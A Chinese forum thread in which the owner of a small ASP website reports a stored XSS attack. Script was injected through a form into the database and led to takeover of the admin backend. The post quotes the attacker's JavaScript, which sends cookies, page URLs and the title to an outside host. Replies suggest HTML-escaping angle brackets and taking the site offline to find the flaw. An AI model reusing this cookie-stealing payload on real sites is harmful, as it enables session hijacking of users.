，网站的数据库被人挂马，各位给个修复的建议！

紧急求助，网站的数据库被人挂马，各位给个修复的建议！！
昨天晚上，我的一个小站被黑客入侵，小站使用的是asp程序做的，黑客主要是通过表单提交js代码到了我的数据库，然后获取了我的后台。

黑客提交的内容：<script src=这里是他的一个地址></script>

打开他的地址出现：

(function(){(new Image()).src='和上面的地址一样/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})())+'&title='+encodeURIComponent((function(){try{return document.title}catch(e){return ''}})());})();

这个该怎么修复呢？？
[解决办法]
每次打开提交的内容的时候就会执行这段JS，然后就发送请求把本地的地址跟一些东西发送到他的服务器里。

简单点么就是每次显示内容的时候先把<>转义成&lt;跟&gt;
[解决办法]
我觉得还是暂时关闭网站，查查漏洞出在哪里。

不然即使你页面都改了，漏洞还在，不还是再改一次而已嘛。
[解决办法]
所有用户提交的内容，将<和>替换为&lt,&gt这样即使有script节点，也不能执行了，只会被当做普通文本

查看更多 下一篇